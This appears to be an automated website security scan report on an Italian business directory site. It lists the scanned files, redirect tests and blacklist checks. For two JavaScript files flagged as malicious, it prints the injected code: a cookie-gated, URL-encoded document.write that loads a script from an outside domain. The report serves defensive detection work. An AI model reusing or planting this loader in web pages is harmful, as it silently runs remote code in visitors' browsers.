Scanned pages/files
Request | Server response | Status |
http://www.oristano-imprese.it/ | 200 OK Content-Length: 81050 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.trieste-imprese.it <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="it" xmlns="http://www.w3.org/1999/xhtml"> <html> <head><script type="text/javascript" src="http://62.196.153.196/CFIDE/scripts/cfform.js"></script> <script type="text/javascript" src="http://62.196.153.196/CFIDE/scripts/masks.js"></script> <me ...[4263 bytes skipped]... | ||
http://62.196.153.196/CFIDE/scripts/cfform.js | 200 OK Content-Length: 10617 Content-Type: application/x-javascript | clean |
http://62.196.153.196/CFIDE/scripts/masks.js | 200 OK Content-Length: 3897 Content-Type: application/x-javascript | clean |
http://www.oristano-imprese.it/common_net/modules/login_mask.js | 200 OK Content-Length: 6326 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var LoadHandler = { handlers:[], add:function(fn){ if(window.onload!=LoadHandler.theHandler) LoadHandler._push(window.onload); LoadHandler._push(fn); window.onload=LoadHandler.theHandler; }, _push:function(fn){ if(typeof(fn)!='function') return; LoadHandler.handlers[LoadHandler.handlers.length]=fn; }, theHandler:function(){ var handlers=LoadHandler.handlers,i=-1,fn; while(fn=handl if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://www.oristano-imprese.it/modules/GreyBox_v5_54/greybox/AJS.js | 200 OK Content-Length: 19831 Content-Type: application/x-javascript | clean |
http://www.oristano-imprese.it/modules/GreyBox_v5_54/greybox/AJS_fx.js | 200 OK Content-Length: 2877 Content-Type: application/x-javascript | clean |
http://www.oristano-imprese.it/modules/GreyBox_v5_54/greybox/gb_scripts.js | 200 OK Content-Length: 10866 Content-Type: application/x-javascript | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js | 200 OK Content-Length: 55740 Content-Type: text/javascript | clean |
http://www.oristano-imprese.it/common_net/modules/ddsmoothmenu/ddsmoothmenu.js | 200 OK Content-Length: 7999 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var ddsmoothmenu={ arrowimages: {down:['downarrowclass', 'http://youbiz.omniatechnology.it/modules/ddsmoothmenu/down.gif', 30], right:['rightarrowclass', 'http://youbiz.omniatechnology.it/modules/ddsmoothmenu/right.gif']}, transition: {overtime:100, outtime:100}, shadow: {enable:true, offsetx:5, offsety:5}, detectwebkit: navigator.userAgent.toLowerCase().indexOf("applewebkit")!=-1, detectie6: document.all && !wind if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://partner.googleadservices.com/gampad/google_service.js | 200 OK Content-Length: 3799 Content-Type: text/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19489 Content-Type: text/javascript | clean |
http://www.oristano-imprese.it/index.cfm | 200 OK Content-Length: 80976 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.trieste-imprese.it <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="it" xmlns="http://www.w3.org/1999/xhtml"> <html> <head><script type="text/javascript" src="http://62.196.153.196/CFIDE/scripts/cfform.js"></script> <script type="text/javascript" src="http://62.196.153.196/CFIDE/scripts/masks.js"></script> <me ...[4263 bytes skipped]... | ||
http://www.oristano-imprese.it/settori/abbigliamento | HTTP/1.1 301 Moved Permanently Connection: close Date: Wed, 14 Jan 2015 22:09:32 GMT Location: http://www.oristano-imprese.it/settori/abbigliamento/ Server: Apache/2.2.3 (CentOS) Content-Length: 349 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.oristano-imprese.it/settori/abbigliamento/ | 200 OK Content-Length: 59120 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.trieste-imprese.it <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="it" xmlns="http://www.w3.org/1999/xhtml"> <html> <head><script type="text/javascript" src="http://62.196.153.196/CFIDE/scripts/cfform.js"></script> <script type="text/javascript" src="http://62.196.153.196/CFIDE/scripts/masks.js"></script> <me ...[4263 bytes skipped]... | ||
http://www.oristano-imprese.it/settori/abbigliamento/common_net/modules/login_mask.js | 404 Not Found Content-Length: 340 Content-Type: text/html | clean |
http://www.oristano-imprese.it/test404page.js | 404 Not Found Content-Length: 300 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: oristano-imprese.it
Result:
GET / HTTP/1.1
Host: oristano-imprese.it
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: oristano-imprese.it
Referer: http://www.google.com/search?q=oristano-imprese.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: oristano-imprese.it
Referer: http://www.google.com/search?q=oristano-imprese.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oristano-imprese.it
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://oristano-imprese.it/
Result: oristano-imprese.it is not infected or malware details are not published yet.
Result: oristano-imprese.it is not infected or malware details are not published yet.